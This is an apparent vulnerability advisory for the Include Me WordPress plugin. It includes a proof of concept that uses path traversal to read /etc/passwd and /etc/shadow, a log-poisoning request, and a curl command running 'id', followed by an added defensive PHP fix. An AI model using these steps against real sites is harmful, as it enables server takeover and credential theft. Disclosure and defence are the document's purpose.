wpvulndb WPVDB-ID: 78575072-4E04-4A8A-BAEC-F313CFFFE829
History: Jun 21, 2021 - 12:00 a.m.

Include Me <= 1.2.1 - Authenticated Remote Code Execution (RCE) via LFI log poisoning

wpscan.com

The plugin is vulnerable to path traversal / local file inclusion, which can lead to Remote Code Execution (RCE) on the system through log poisoning and therefore potentially to a full compromise of the underlying infrastructure.

PoC

RCE through chaining LFI with log poisoning

# 1. Path Traversal / Local File Inclusion
# Authenticate as any user who can create blog posts on WordPress, for example a user with the "author" role.
# Create a new WordPress blog post, paste the following content into it and visit the newly created page:

[includeme file="/…/…/…/…/etc/passwd" value="This is a basic path traversal poc"]

# The contents of /etc/passwd will be displayed.

# 2. Log poisoning
# The PoC was constructed with the LAMPP stack on Ubuntu 20.04 LTS. LAMPP keeps the apache2 error log under /opt/lampp/logs/error_log, which is used here for demonstration purposes.
# Note that the default apache2 log can be found under /var/log/apache2/access.log; if you don't use the LAMPP stack, use /var/log/apache2/access.log for the log poisoning part.
# Reference: https://www.hackingarticles.in/apache-log-poisoning-through-lfi/
# First, we try to open a restricted file like /etc/shadow to get an entry in /opt/lampp/logs/error_log.
# The error_log file reflects the HTTP "Referer" header, so arbitrary PHP functions can be injected through the "Referer" to obtain Remote Code Execution.
# Open Burp Suite to intercept the request and append the payload to the "Referer" field.
# Payload (without the quotes): ";"

POST /wordpress/wp-json/wp/v2/posts/116?_locale=user HTTP/1.1
Host: localhost
Content-Length: 303
Accept: application/json, /;q=0.1
X-WP-Nonce: 7eb92e9895
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9
X-HTTP-Method-Override: PUT
Content-Type: application/json
Origin: http://localhost
Referer: http://localhost/wordpress/wp-admin/post.php?post=116&action;=edit;
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5d1e5a05b96398a14a61f963d4699ca9=BossisBack%7C1624379188%7CafC9qioiHNrTPEtqjzjgXuW96F0014a9TLOBz8b0phV%7C2e28994b4d0cd0574000263018f2f266877b3124fb65c91f63e49ea6df92b095; wp-settings-2=mfold%3Do; wp-settings-time-2=1624206389
dnt: 1
sec-gpc: 1
Connection: close

{"id":116,"content":"\n

test page

\n\n\n\n[includeme file="…/…/…/…/etc/shadow" value="My name is Stefano"]\n\n\n\n

\n"}

# On the same blog post, change the file back to [includeme file="…/…/…/…/opt/lampp/logs/error_log" value="test"].
# Now the GET parameter "cmd" can be used to execute system commands.
# Append "?cmd=id" to the URL of your published blog post, for example:
$ curl http://localhost/wordpress/2021/06/20/myblogpost/?cmd=id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
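The two halves of the chain above are an unconfined file path in the shortcode and a log file that ends up being executed as PHP. The following is an added example written for this note, not the Include Me plugin's own code: a hypothetical replacement handler for an [includeme file="..."] shortcode that resolves the requested name against one allowlisted directory (the constant INCLUDEME_BASE_DIR is an assumed location), rejects anything whose canonical path escapes that directory, and renders the file as escaped text instead of passing it to include(). The fallback definitions of shortcode_atts(), esc_html() and the CLI demo block only exist so the file runs stand-alone outside WordPress.

```php
<?php
// Added example (not the plugin's source): path-confined handling for an
// [includeme file="..." value="..."] shortcode.
// Assumption: files meant for inclusion live under one dedicated directory.
if (!defined('INCLUDEME_BASE_DIR')) {
    define('INCLUDEME_BASE_DIR', '/var/www/html/wp-content/includeme-files'); // assumed location
}

// Stand-alone fallbacks so the script runs outside WordPress (WordPress provides the real ones).
if (!function_exists('shortcode_atts')) {
    function shortcode_atts(array $pairs, array $atts, string $tag = ''): array {
        return array_merge($pairs, array_intersect_key($atts, $pairs));
    }
}
if (!function_exists('esc_html')) {
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
    }
}

/**
 * Resolve $file relative to $base and confirm the canonical result stays inside $base.
 * Returns the canonical path of an existing regular file, or null when the name is
 * absolute, contains a NUL byte, does not exist, or traverses out of $base.
 */
function includeme_resolve_safe_path(string $file, string $base): ?string {
    $base_real = realpath($base);
    if ($base_real === false) {
        return null;                       // allowlisted directory missing: serve nothing
    }
    if ($file === '' || $file[0] === '/' || strpos($file, "\0") !== false) {
        return null;                       // only relative names without NUL bytes are accepted
    }
    $candidate = realpath($base_real . DIRECTORY_SEPARATOR . $file);
    if ($candidate === false || !is_file($candidate)) {
        return null;                       // nonexistent, or a directory/device rather than a file
    }
    // Compare against the base plus a trailing separator so "/basedir-other" cannot pass.
    $prefix = rtrim($base_real, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                       // "../" sequences resolved outside the allowlisted directory
    }
    return $candidate;
}

/** Shortcode callback: show the file as text; never include() user-chosen paths. */
function includeme_shortcode_handler(array $atts): string {
    $atts = shortcode_atts(['file' => '', 'value' => ''], $atts, 'includeme');
    $path = includeme_resolve_safe_path((string) $atts['file'], INCLUDEME_BASE_DIR);
    if ($path === null) {
        // Log only a fixed message plus the length; the raw attribute is attacker-controlled.
        error_log('includeme: rejected file attribute (' . strlen((string) $atts['file']) . ' bytes)');
        return esc_html((string) $atts['value']);   // assumed fallback: render the literal value
    }
    // Reading and escaping means a poisoned log or any other file is displayed, not executed.
    return esc_html((string) file_get_contents($path));
}

if (function_exists('add_shortcode')) {
    add_shortcode('includeme', 'includeme_shortcode_handler');
}

// CLI demo with a constructed allowlisted directory: one allowed name, three rejected ones.
if (PHP_SAPI === 'cli' && !function_exists('add_shortcode')) {
    $demo_dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'includeme-demo';
    @mkdir($demo_dir);
    file_put_contents($demo_dir . DIRECTORY_SEPARATOR . 'notice.txt', "hello from an allowed file\n");
    foreach (['notice.txt', '../../../../etc/passwd', '/etc/passwd', 'missing.txt'] as $name) {
        $resolved = includeme_resolve_safe_path($name, $demo_dir);
        printf("%-26s => %s\n", $name, $resolved === null ? 'REJECTED' : 'OK ' . $resolved);
    }
}
```

The realpath() step is what defeats the traversal in step 1: "../" sequences are collapsed before the prefix comparison, so the check operates on where the path actually lands rather than on the string the author typed. Reading the file with file_get_contents() and escaping it addresses step 2 independently: even if a web server log reflecting the Referer header were somehow reachable, its contents would be displayed as text, not evaluated as PHP. Keeping Apache's access and error logs outside any directory the web user can read, and outside the allowlist, removes the poisoning target altogether.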

CPE
Name        Operator    Version
include-me  eq          *